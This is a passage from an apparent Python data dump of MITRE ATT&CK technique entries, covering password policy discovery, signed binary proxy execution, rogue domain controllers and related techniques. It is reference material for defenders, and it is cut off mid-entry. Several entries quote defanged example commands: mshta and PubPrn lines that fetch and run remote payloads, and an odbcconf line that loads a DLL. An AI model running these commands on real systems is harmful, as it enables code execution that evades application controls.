                          'wireless access to an existing network (Citation: McMillan Pwn March 2012), and others.',
           'name': 'Hardware Additions',
           'platforms': ['Windows', 'Linux', 'macOS']},
 'T1201': {'attack_id': 'T1201',
           'categories': ['discovery'],
           'description': 'Adversaries may attempt to access detailed information about the password policy used '
                          'within an enterprise network. Password policies for networks are a way to enforce complex '
                          'passwords that are difficult to guess or crack through [Brute '
                          'Force](https://attack.mitre.org/techniques/T1110). This would help the adversary to create '
                          'a list of common passwords and launch dictionary and/or brute force attacks which adheres '
                          'to the policy (e.g. if the minimum password length should be 8, then not trying passwords '
                          "such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is "
                          'set to 6 as to not lock out accounts).\n'
                          '\n'
                          'Password policies can be set and discovered on Windows, Linux, and macOS systems via '
                          'various command shell utilities such as <code>net accounts (/domain)</code>, '
                          '<code>Get-ADDefaultDomainPasswordPolicy</code>, <code>chage -l <username></code>, <code>cat '
                          '/etc/pam.d/common-password</code>, and <code>pwpolicy getaccountpolicies</code>.(Citation: '
                          'Superuser Linux Password Policies) (Citation: Jamf User Password Policies)',
           'name': 'Password Policy Discovery',
           'platforms': ['Windows', 'Linux', 'macOS']},
 'T1202': {'attack_id': 'T1202',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may abuse utilities that allow for command execution to bypass security '
                          'restrictions that limit the use of command-line interpreters. Various Windows utilities may '
                          'be used to execute commands, possibly without invoking '
                          '[cmd](https://attack.mitre.org/software/S0106). For example, '
                          '[Forfiles](https://attack.mitre.org/software/S0193), the Program Compatibility Assistant '
                          '(pcalua.exe), components of the Windows Subsystem for Linux (WSL), as well as other '
                          'utilities may invoke the execution of programs and commands from a [Command and Scripting '
                          'Interpreter](https://attack.mitre.org/techniques/T1059), Run window, or via scripts. '
                          '(Citation: VectorSec ForFiles Aug 2017) (Citation: Evi1cg Forfiles Nov 2017)\n'
                          '\n'
                          'Adversaries may abuse these features for [Defense '
                          'Evasion](https://attack.mitre.org/tactics/TA0005), specifically to perform arbitrary '
                          'execution while subverting detections and/or mitigation controls (such as Group Policy) '
                          'that limit/prevent the usage of [cmd](https://attack.mitre.org/software/S0106) or file '
                          'extensions more commonly associated with malicious payloads.',
           'name': 'Indirect Command Execution',
           'platforms': ['Windows']},
 'T1203': {'attack_id': 'T1203',
           'categories': ['execution'],
           'description': 'Adversaries may exploit software vulnerabilities in client applications to execute code. '
                          'Vulnerabilities can exist in software due to unsecure coding practices that can lead to '
                          'unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through '
                          'targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most '
                          'valuable exploits to an offensive toolkit are those that can be used to obtain code '
                          'execution on a remote system because they can be used to gain access to that system. Users '
                          'will expect to see files related to the applications they commonly used to do work, so they '
                          'are a useful target for exploit research and development because of their high utility.\n'
                          '\n'
                          'Several types exist:\n'
                          '\n'
                          '### Browser-based Exploitation\n'
                          '\n'
                          'Web browsers are a common target through [Drive-by '
                          'Compromise](https://attack.mitre.org/techniques/T1189) and [Spearphishing '
                          'Link](https://attack.mitre.org/techniques/T1566/002). Endpoint systems may be compromised '
                          'through normal web browsing or from certain users being targeted by links in spearphishing '
                          'emails to adversary controlled sites used to exploit the web browser. These often do not '
                          'require an action by the user for the exploit to be executed.\n'
                          '\n'
                          '### Office Applications\n'
                          '\n'
                          'Common office and productivity applications such as Microsoft Office are also targeted '
                          'through [Phishing](https://attack.mitre.org/techniques/T1566). Malicious files will be '
                          'transmitted directly as attachments or through links to download them. These require the '
                          'user to open the document or file for the exploit to run.\n'
                          '\n'
                          '### Common Third-party Applications\n'
                          '\n'
                          'Other applications that are commonly seen or are part of the software deployed in a target '
                          'network may also be used for exploitation. Applications such as Adobe Reader and Flash, '
                          'which are common in enterprise environments, have been routinely targeted by adversaries '
                          'attempting to gain access to systems. Depending on the software and nature of the '
                          'vulnerability, some may be exploited in the browser or require the user to open a file. For '
                          'instance, some Flash exploits have been delivered as objects within Microsoft Office '
                          'documents.',
           'name': 'Exploitation for Client Execution',
           'platforms': ['Linux', 'Windows', 'macOS']},
 'T1204': {'attack_id': 'T1204',
           'categories': ['execution'],
           'description': 'An adversary may rely upon specific actions by a user in order to gain execution. Users may '
                          'be subjected to social engineering to get them to execute malicious code by, for example, '
                          'opening a malicious document file or link. These user actions will typically be observed as '
                          'follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).\n'
                          '\n'
                          'While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly '
                          'after Initial Access it may occur at other phases of an intrusion, such as when an '
                          "adversary places a file in a shared directory or on a user's desktop hoping that a user "
                          'will click on it. This activity may also be seen shortly after [Internal '
                          'Spearphishing](https://attack.mitre.org/techniques/T1534).',
           'name': 'User Execution',
           'platforms': ['Linux', 'Windows', 'macOS']},
 'T1204.001': {'attack_id': 'T1204.001',
               'categories': ['execution'],
               'description': 'An adversary may rely upon a user clicking a malicious link in order to gain execution. '
                              'Users may be subjected to social engineering to get them to click on a link that will '
                              'lead to code execution. This user action will typically be observed as follow-on '
                              'behavior from [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002). '
                              'Clicking on a link may also lead to other execution techniques such as exploitation of '
                              'a browser or application vulnerability via [Exploitation for Client '
                              'Execution](https://attack.mitre.org/techniques/T1203). Links may also lead users to '
                              'download files that require execution via [Malicious '
                              'File](https://attack.mitre.org/techniques/T1204/002).',
               'name': 'Malicious Link',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1204.002': {'attack_id': 'T1204.002',
               'categories': ['execution'],
               'description': 'An adversary may rely upon a user opening a malicious file in order to gain execution. '
                              'Users may be subjected to social engineering to get them to open a file that will lead '
                              'to code execution. This user action will typically be observed as follow-on behavior '
                              'from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). '
                              'Adversaries may use several types of files that require a user to execute them, '
                              'including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n'
                              '\n'
                              'Adversaries may employ various forms of '
                              '[Masquerading](https://attack.mitre.org/techniques/T1036) on the file to increase the '
                              'likelihood that a user will open it.\n'
                              '\n'
                              'While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs '
                              'shortly after Initial Access it may occur at other phases of an intrusion, such as when '
                              "an adversary places a file in a shared directory or on a user's desktop hoping that a "
                              'user will click on it. This activity may also be seen shortly after [Internal '
                              'Spearphishing](https://attack.mitre.org/techniques/T1534).',
               'name': 'Malicious File',
               'platforms': ['Linux', 'macOS', 'Windows']},
 'T1205': {'attack_id': 'T1205',
           'categories': ['defense-evasion', 'persistence', 'command-and-control'],
           'description': 'Adversaries may use traffic signaling to hide open ports or other malicious functionality '
                          'used for persistence or command and control. Traffic signaling involves the use of a magic '
                          'value or sequence that must be sent to a system to trigger a special response, such as '
                          'opening a closed port or executing a malicious task. This may take the form of sending a '
                          'series of packets with certain characteristics before a port will be opened that the '
                          'adversary can use for command and control. Usually this series of packets consists of '
                          'attempted connections to a predefined sequence of closed ports (i.e. [Port '
                          'Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, '
                          'specific strings, or other unique characteristics. After the sequence is completed, opening '
                          'a port may be accomplished by the host-based firewall, but could also be implemented by '
                          'custom software.\n'
                          '\n'
                          'Adversaries may also communicate with an already open port, but the service listening on '
                          'that port will only respond to commands or trigger other malicious functionality if passed '
                          'the appropriate magic value(s).\n'
                          '\n'
                          'The observation of the signal packets to trigger the communication can be conducted through '
                          'different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r '
                          '2002), is to use the libpcap libraries to sniff for the packets in question. Another method '
                          'leverages raw sockets, which enables the malware to use ports that are already open for use '
                          'by other programs.\n'
                          '\n'
                          'On network devices, adversaries may use crafted packets to enable [Network Device '
                          'Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services '
                          'offered by the device such as telnet.  Such signaling may also be used to open a closed '
                          'service port such as telnet, or to trigger module modification of malware implants on the '
                          'device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock '
                          'Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks)  '
                          'To enable this traffic signaling on embedded devices, adversaries must first achieve and '
                          'leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the '
                          'monolithic nature of the architecture.',
           'name': 'Traffic Signaling',
           'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1205.001': {'attack_id': 'T1205.001',
               'categories': ['defense-evasion', 'persistence', 'command-and-control'],
               'description': 'Adversaries may use port knocking to hide open ports used for persistence or command '
                              'and control. To enable a port, an adversary sends a series of attempted connections to '
                              'a predefined sequence of closed ports. After the sequence is completed, opening a port '
                              'is often accomplished by the host based firewall, but could also be implemented by '
                              'custom software.\n'
                              '\n'
                              'This technique has been observed to both for the dynamic opening of a listening port as '
                              'well as the initiating of a connection to a listening server on a different system.\n'
                              '\n'
                              'The observation of the signal packets to trigger the communication can be conducted '
                              'through different methods. One means, originally implemented by Cd00r (Citation: '
                              'Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in '
                              'question. Another method leverages raw sockets, which enables the malware to use ports '
                              'that are already open for use by other programs.',
               'name': 'Port Knocking',
               'platforms': ['Linux', 'macOS', 'Windows', 'Network']},
 'T1207': {'attack_id': 'T1207',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may register a rogue Domain Controller to enable manipulation of Active '
                          'Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is '
                          'a method of manipulating Active Directory (AD) data, including objects and schemas, by '
                          'registering (or reusing an inactive registration) and simulating the behavior of a DC. '
                          '(Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate '
                          'changes into AD infrastructure for any domain object, including credentials and keys.\n'
                          '\n'
                          'Registering a rogue DC involves creating a new server and nTDSDSA objects in the '
                          'Configuration partition of the AD schema, which requires Administrator privileges (either '
                          'Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)\n'
                          '\n'
                          'This technique may bypass system logging and security monitors such as security information '
                          'and event management (SIEM) products (since actions taken on a rogue DC may not be reported '
                          'to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and '
                          'delete replication and other associated metadata to obstruct forensic analysis. Adversaries '
                          'may also utilize this technique to perform [SID-History '
                          'Injection](https://attack.mitre.org/techniques/T1178) and/or manipulate AD objects (such as '
                          'accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: '
                          'DCShadow Blog)',
           'name': 'Rogue Domain Controller',
           'platforms': ['Windows']},
 'T1210': {'attack_id': 'T1210',
           'categories': ['lateral-movement'],
           'description': 'Adversaries may exploit remote services to gain unauthorized access to internal systems '
                          'once inside of a network. Exploitation of a software vulnerability occurs when an adversary '
                          'takes advantage of a programming error in a program, service, or within the operating '
                          'system software or kernel itself to execute adversary-controlled code.\xa0A common goal for '
                          'post-compromise exploitation of remote services is for lateral movement to enable access to '
                          'a remote system.\n'
                          '\n'
                          'An adversary may need to determine if the remote system is in a vulnerable state, which may '
                          'be done through [Network Service Scanning](https://attack.mitre.org/techniques/T1046) or '
                          'other Discovery methods looking for common, vulnerable software that may be deployed in the '
                          'network, the lack of certain patches that may indicate vulnerabilities,  or security '
                          'software that may be used to detect or contain remote exploitation. Servers are likely a '
                          'high value target for lateral movement exploitation, but endpoint systems may also be at '
                          'risk if they provide an advantage or access to additional resources.\n'
                          '\n'
                          'There are several well-known vulnerabilities that exist in common services such as SMB '
                          '(Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well '
                          'as applications that may be used within internal networks such as MySQL (Citation: NVD '
                          'CVE-2016-6662) and web server services. (Citation: NVD CVE-2014-7169)\n'
                          '\n'
                          'Depending on the permissions level of the vulnerable remote service an adversary may '
                          'achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) '
                          'as a result of lateral movement exploitation as well.',
           'name': 'Exploitation of Remote Services',
           'platforms': ['Linux', 'Windows', 'macOS']},
 'T1211': {'attack_id': 'T1211',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may exploit a system or application vulnerability to bypass security features. '
                          'Exploitation of a software vulnerability occurs when an adversary takes advantage of a '
                          'programming error in a program, service, or within the operating system software or kernel '
                          'itself to execute adversary-controlled code.\xa0Vulnerabilities may exist in defensive '
                          'security software that can be used to disable or circumvent them.\n'
                          '\n'
                          'Adversaries may have prior knowledge through reconnaissance that security software exists '
                          'within an environment or they may perform checks during or shortly after the system is '
                          'compromised for [Security Software '
                          'Discovery](https://attack.mitre.org/techniques/T1518/001). The security software will '
                          'likely be targeted directly for exploitation. There are examples of antivirus software '
                          'being targeted by persistent threat groups to avoid detection.',
           'name': 'Exploitation for Defense Evasion',
           'platforms': ['Linux', 'Windows', 'macOS']},
 'T1212': {'attack_id': 'T1212',
           'categories': ['credential-access'],
           'description': 'Adversaries may exploit software vulnerabilities in an attempt to collect credentials. '
                          'Exploitation of a software vulnerability occurs when an adversary takes advantage of a '
                          'programming error in a program, service, or within the operating system software or kernel '
                          'itself to execute adversary-controlled code.\xa0Credentialing and authentication mechanisms '
                          'may be targeted for exploitation by adversaries as a means to gain access to useful '
                          'credentials or circumvent the process to gain access to systems. One example of this is '
                          'MS14-068, which targets Kerberos and can be used to forge Kerberos tickets using domain '
                          'user permissions.(Citation: Technet MS14-068)(Citation: ADSecurity Detecting Forged '
                          'Tickets) Exploitation for credential access may also result in Privilege Escalation '
                          'depending on the process targeted or credentials obtained.',
           'name': 'Exploitation for Credential Access',
           'platforms': ['Linux', 'Windows', 'macOS']},
 'T1213': {'attack_id': 'T1213',
           'categories': ['collection'],
           'description': 'Adversaries may leverage information repositories to mine valuable information. Information '
                          'repositories are tools that allow for storage of information, typically to facilitate '
                          'collaboration or information sharing between users, and can store a wide variety of data '
                          'that may aid adversaries in further objectives, or direct access to the target '
                          'information.\n'
                          '\n'
                          'The following is a brief list of example information that may hold potential value to an '
                          'adversary and may also be found on an information repository:\n'
                          '\n'
                          '* Policies, procedures, and standards\n'
                          '* Physical / logical network diagrams\n'
                          '* System architecture diagrams\n'
                          '* Technical system documentation\n'
                          '* Testing / development credentials\n'
                          '* Work / project schedules\n'
                          '* Source code snippets\n'
                          '* Links to network shares and other internal resources\n'
                          '\n'
                          'Information stored in a repository may vary based on the specific instance or environment. '
                          'Specific common information repositories include '
                          '[Sharepoint](https://attack.mitre.org/techniques/T1213/002), '
                          '[Confluence](https://attack.mitre.org/techniques/T1213/001), and enterprise databases such '
                          'as SQL Server.',
           'name': 'Data from Information Repositories',
           'platforms': ['Linux', 'Windows', 'macOS', 'SaaS', 'Office 365']},
 'T1213.001': {'attack_id': 'T1213.001',
               'categories': ['collection'],
               'description': '\n'
                              'Adversaries may leverage Confluence repositories to mine valuable information. Often '
                              'found in development environments alongside Atlassian JIRA, Confluence is generally '
                              'used to store development-related documentation, however, in general may contain more '
                              'diverse categories of useful information, such as:\n'
                              '\n'
                              '* Policies, procedures, and standards\n'
                              '* Physical / logical network diagrams\n'
                              '* System architecture diagrams\n'
                              '* Technical system documentation\n'
                              '* Testing / development credentials\n'
                              '* Work / project schedules\n'
                              '* Source code snippets\n'
                              '* Links to network shares and other internal resources\n',
               'name': 'Confluence',
               'platforms': ['SaaS']},
 'T1213.002': {'attack_id': 'T1213.002',
               'categories': ['collection'],
               'description': 'Adversaries may leverage the SharePoint repository as a source to mine valuable '
                              'information. SharePoint will often contain useful information for an adversary to learn '
                              'about the structure and functionality of the internal network and systems. For example, '
                              'the following is a list of example information that may hold potential value to an '
                              'adversary and may also be found on SharePoint:\n'
                              '\n'
                              '* Policies, procedures, and standards\n'
                              '* Physical / logical network diagrams\n'
                              '* System architecture diagrams\n'
                              '* Technical system documentation\n'
                              '* Testing / development credentials\n'
                              '* Work / project schedules\n'
                              '* Source code snippets\n'
                              '* Links to network shares and other internal resources\n',
               'name': 'Sharepoint',
               'platforms': ['Windows', 'Office 365']},
 'T1216': {'attack_id': 'T1216',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may use scripts signed with trusted certificates to proxy execution of '
                          'malicious files. Several Microsoft signed scripts that are default on Windows installations '
                          'can be used to proxy execution of other files. This behavior may be abused by adversaries '
                          'to execute malicious files that could bypass application control and signature validation '
                          'on systems.(Citation: GitHub Ultimate AppLocker Bypass List)',
           'name': 'Signed Script Proxy Execution',
           'platforms': ['Windows']},
 'T1216.001': {'attack_id': 'T1216.001',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may use the trusted PubPrn script to proxy execution of malicious files. '
                              'This behavior may bypass signature validation restrictions and application control '
                              'solutions that do not account for use of these scripts.\n'
                              '\n'
                              '<code>PubPrn.vbs</code> is a Visual Basic script that publishes a printer to Active '
                              'Directory Domain Services. The script is signed by Microsoft and can be used to proxy '
                              'execution from a remote site.(Citation: Enigma0x3 PubPrn Bypass) An example command is '
                              '<code>cscript C[:]\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\pubprn[.]vbs '
                              '127.0.0.1 script:http[:]//192.168.1.100/hi.png</code>.',
               'name': 'PubPrn',
               'platforms': ['Windows']},
 'T1217': {'attack_id': 'T1217',
           'categories': ['discovery'],
           'description': 'Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser '
                          'bookmarks may reveal personal information about users (ex: banking sites, interests, social '
                          'media, etc.) as well as details about internal network resources such as servers, '
                          'tools/dashboards, or other related infrastructure.\n'
                          '\n'
                          'Browser bookmarks may also highlight additional targets after an adversary has access to '
                          'valid credentials, especially [Credentials In '
                          'Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a '
                          'browser.\n'
                          '\n'
                          'Specific storage locations vary based on platform and/or application, but browser bookmarks '
                          'are typically stored in local files/databases.',
           'name': 'Browser Bookmark Discovery',
           'platforms': ['Linux', 'Windows', 'macOS']},
 'T1218': {'attack_id': 'T1218',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may bypass process and/or signature-based defenses by proxying execution of '
                          'malicious content with signed binaries. Binaries signed with trusted digital certificates '
                          'can execute on Windows systems protected by digital signature validation. Several Microsoft '
                          'signed binaries that are default on Windows installations can be used to proxy execution of '
                          'other files.',
           'name': 'Signed Binary Proxy Execution',
           'platforms': ['Windows']},
 'T1218.001': {'attack_id': 'T1218.001',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files '
                              'are commonly distributed as part of the Microsoft HTML Help system. CHM files are '
                              'compressed compilations of various content such as HTML documents, images, and '
                              'scripting/web related programming languages such VBA, JScript, Java, and ActiveX. '
                              '(Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying '
                              'components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) '
                              'loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help '
                              'Executable Program)\n'
                              '\n'
                              'A custom CHM file containing embedded payloads could be delivered to a victim then '
                              'triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution '
                              'may also bypass application application control on older and/or unpatched systems that '
                              'do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug '
                              '2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)',
               'name': 'Compiled HTML File',
               'platforms': ['Windows']},
 'T1218.002': {'attack_id': 'T1218.002',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows '
                              'Control Panel process binary (control.exe) handles execution of Control Panel items, '
                              'which are utilities that allow users to view and adjust computer settings.\n'
                              '\n'
                              'Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the '
                              'latter are actually renamed dynamic-link library (.dll) files that export a '
                              '<code>CPlApplet</code> function.(Citation: Microsoft Implementing CPL)(Citation: '
                              'TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include '
                              'graphical menus available to users after being registered and loaded into the Control '
                              'Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed '
                              'directly from the command line, programmatically via an application programming '
                              'interface (API) call, or by simply double-clicking the file.(Citation: Microsoft '
                              'Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL '
                              'Malware Dec 2013)\n'
                              '\n'
                              'Malicious Control Panel items can be delivered via '
                              '[Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro '
                              'CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of '
                              'multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, '
                              'specifically CPL files, may also bypass application and/or file extension allow lists.\n'
                              '\n'
                              'Adversaries may also rename malicious DLL files (.dll) with Control Panel file '
                              'extensions (.cpl) and register them to '
                              '<code>HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Control Panel\\Cpls</code>. '
                              'Even when these registered DLLs do not comply with the CPL file specification and do '
                              'not export <code>CPlApplet</code> functions, they are loaded and executed through its '
                              '<code>DllEntryPoint</code> when Control Panel is executed. CPL files not exporting '
                              '<code>CPlApplet</code> are not directly executable.(Citation: ESET InvisiMole June '
                              '2020)',
               'name': 'Control Panel',
               'platforms': ['Windows']},
 'T1218.003': {'attack_id': 'T1218.003',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft '
                              'Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to '
                              'install Connection Manager service profiles. (Citation: Microsoft Connection Manager '
                              'Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and '
                              'installs a service profile leveraged for remote access connections.\n'
                              '\n'
                              'Adversaries may supply CMSTP.exe with INF files infected with malicious commands. '
                              '(Citation: Twitter CMSTP Usage Jan 2018) Similar to '
                              '[Regsvr32](https://attack.mitre.org/techniques/T1218/010) / ”Squiblydoo”, CMSTP.exe may '
                              'be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017)  and/or COM '
                              'scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: '
                              'GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This '
                              'execution may also bypass AppLocker and other application control defenses since '
                              'CMSTP.exe is a legitimate, signed Microsoft application.\n'
                              '\n'
                              'CMSTP.exe can also be abused to [Bypass User Account '
                              'Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands '
                              'from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP '
                              'Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP '
                              'July 2018)',
               'name': 'CMSTP',
               'platforms': ['Windows']},
 'T1218.004': {'attack_id': 'T1218.004',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may use InstallUtil to proxy execution of code through a trusted Windows '
                              'utility. InstallUtil is a command-line utility that allows for installation and '
                              'uninstallation of resources by executing specific installer components specified in '
                              '.NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by '
                              'Microsoft and located in the .NET directories on a Windows system: '
                              '<code>C:\\Windows\\Microsoft.NET\\Framework\\v<version>\\InstallUtil.exe</code> and '
                              '<code>C:\\Windows\\Microsoft.NET\\Framework64\\v<version>\\InstallUtil.exe</code>.\n'
                              '\n'
                              'InstallUtil may also be used to bypass application control through use of attributes '
                              'within the binary that execute the class decorated with the attribute '
                              '<code>[System.ComponentModel.RunInstaller(true)]</code>. (Citation: LOLBAS Installutil)',
               'name': 'InstallUtil',
               'platforms': ['Windows']},
 'T1218.005': {'attack_id': 'T1218.005',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse mshta.exe to proxy execution of malicious .hta files and '
                              'Javascript or VBScript through a trusted Windows utility. There are several examples of '
                              'different types of threats leveraging mshta.exe during initial compromise and for '
                              'execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part '
                              'Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter '
                              'Analysis) (Citation: FireEye FIN7 April 2017) \n'
                              '\n'
                              'Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. '
                              '(Citation: Wikipedia HTML Application) HTAs are standalone applications that execute '
                              'using the same models and technologies of Internet Explorer, but outside of the '
                              'browser. (Citation: MSDN HTML Applications)\n'
                              '\n'
                              'Files may be executed by mshta.exe through an inline script: <code>mshta '
                              'vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))</code>\n'
                              '\n'
                              'They may also be executed directly from URLs: <code>mshta '
                              'http[:]//webserver/payload[.]hta</code>\n'
                              '\n'
                              'Mshta.exe can be used to bypass application control solutions that do not account for '
                              "its potential use. Since mshta.exe executes outside of the Internet Explorer's security "
                              'context, it also bypasses browser security settings. (Citation: LOLBAS Mshta)',
               'name': 'Mshta',
               'platforms': ['Windows']},
 'T1218.007': {'attack_id': 'T1218.007',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse msiexec.exe to proxy execution of malicious payloads. Msiexec.exe '
                              'is the command-line utility for the Windows Installer and is thus commonly associated '
                              'with executing installation packages (.msi).(Citation: Microsoft msiexec) Msiexec.exe '
                              'is digitally signed by Microsoft.\n'
                              '\n'
                              'Adversaries may abuse msiexec.exe to launch local or network accessible MSI files. '
                              'Msiexec.exe can also execute DLLs.(Citation: LOLBAS Msiexec)(Citation: TrendMicro '
                              'Msiexec Feb 2018) Since it is signed and native on Windows systems, msiexec.exe can be '
                              'used to bypass application control solutions that do not account for its potential '
                              'abuse.',
               'name': 'Msiexec',
               'platforms': ['Windows']},
 'T1218.008': {'attack_id': 'T1218.008',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse odbcconf.exe to proxy execution of malicious payloads. '
                              'Odbcconf.exe is a Windows utility that allows you to configure Open Database '
                              'Connectivity (ODBC) drivers and data source names.(Citation: Microsoft odbcconf.exe) '
                              'Odbcconf.exe is digitally signed by Microsoft.\n'
                              '\n'
                              'Adversaries may abuse odbcconf.exe to bypass application control solutions that do not '
                              'account for its potential abuse. Similar to '
                              '[Regsvr32](https://attack.mitre.org/techniques/T1218/010), odbcconf.exe has a '
                              '<code>REGSVR</code> flag that can be misused to execute DLLs (ex: <code>odbcconf.exe /S '
                              '/A &lbrace;REGSVR "C:\\Users\\Public\\file.dll"&rbrace;</code>). (Citation: LOLBAS '
                              'Odbcconf)(Citation: TrendMicro Squiblydoo Aug 2017)(Citation: TrendMicro Cobalt Group '
                              'Nov 2017) \n',
               'name': 'Odbcconf',
               'platforms': ['Windows']},
 'T1218.009': {'attack_id': 'T1218.009',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted '
                              'Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to '
                              'register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) '
                              '(COM) assemblies. Both are digitally signed by Microsoft. (Citation: MSDN Regsvcs) '
                              '(Citation: MSDN Regasm)\n'
                              '\n'
                              'Both utilities may be used to bypass application control through use of attributes '
                              'within the binary to specify code that should be run before registration or '
                              'unregistration: <code>[ComRegisterFunction]</code> or '
                              '<code>[ComUnregisterFunction]</code> respectively. The code with the registration and '
                              'unregistration attributes will be executed even if the process is run under '
                              'insufficient privileges and fails to execute. (Citation: LOLBAS Regsvcs)(Citation: '
                              'LOLBAS Regasm)',
               'name': 'Regsvcs/Regasm',
               'platforms': ['Windows']},
 'T1218.010': {'attack_id': 'T1218.010',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe '
                              'is a command-line program used to register and unregister object linking and embedding '
                              'controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is '
                              'also a Microsoft signed binary. (Citation: Microsoft Regsvr32)\n'
                              '\n'
                              'Malicious usage of Regsvr32.exe may avoid triggering security tools that may not '
                              'monitor execution of, and modules loaded by, the regsvr32.exe process because of '
                              'allowlists or false positives from Windows using regsvr32.exe for normal operations. '
                              'Regsvr32.exe can also be used to specifically bypass application control using '
                              'functionality to load COM scriptlets to execute DLLs under user permissions. Since '
                              'Regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform '
                              'resource locator (URL) to file on an external Web server as an argument during '
                              'invocation. This method makes no changes to the Registry as the COM object is not '
                              'actually registered, only executed. (Citation: LOLBAS Regsvr32) This variation of the '
                              'technique is often referred to as a "Squiblydoo" attack and has been used in campaigns '
                              'targeting governments. (Citation: Carbon Black Squiblydoo Apr 2016) (Citation: FireEye '
                              'Regsvr32 Targeting Mongolian Gov)\n'
                              '\n'
                              'Regsvr32.exe can also be leveraged to register a COM Object used to establish '
                              'persistence via [Component Object Model '
                              'Hijacking](https://attack.mitre.org/techniques/T1546/015). (Citation: Carbon Black '
                              'Squiblydoo Apr 2016)',
               'name': 'Regsvr32',
               'platforms': ['Windows']},
 'T1218.011': {'attack_id': 'T1218.011',
               'categories': ['defense-evasion'],
               'description': 'Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using '
                              'rundll32.exe, vice executing directly (i.e. [Shared '
                              'Modules](https://attack.mitre.org/techniques/T1129)), may avoid triggering security '
                              'tools that may not monitor execution of the rundll32.exe process because of allowlists '
                              'or false positives from normal operations. Rundll32.exe is commonly associated with '
                              'executing DLL payloads.\n'
                              '\n'
                              'Rundll32.exe can also be used to execute [Control '
                              'Panel](https://attack.mitre.org/techniques/T1218/002) Item files (.cpl) through the '
                              'undocumented shell32.dll functions <code>Control_RunDLL</code> and '
                              '<code>Control_RunDLLAsUser</code>. Double-clicking a .cpl file also causes rundll32.exe '
                              'to execute. (Citation: Trend Micro CPL)\n'
                              '\n'
                              'Rundll32 can also be used to execute scripts such as JavaScript. This can be done using '
                              'a syntax similar to this: <code>rundll32.exe '
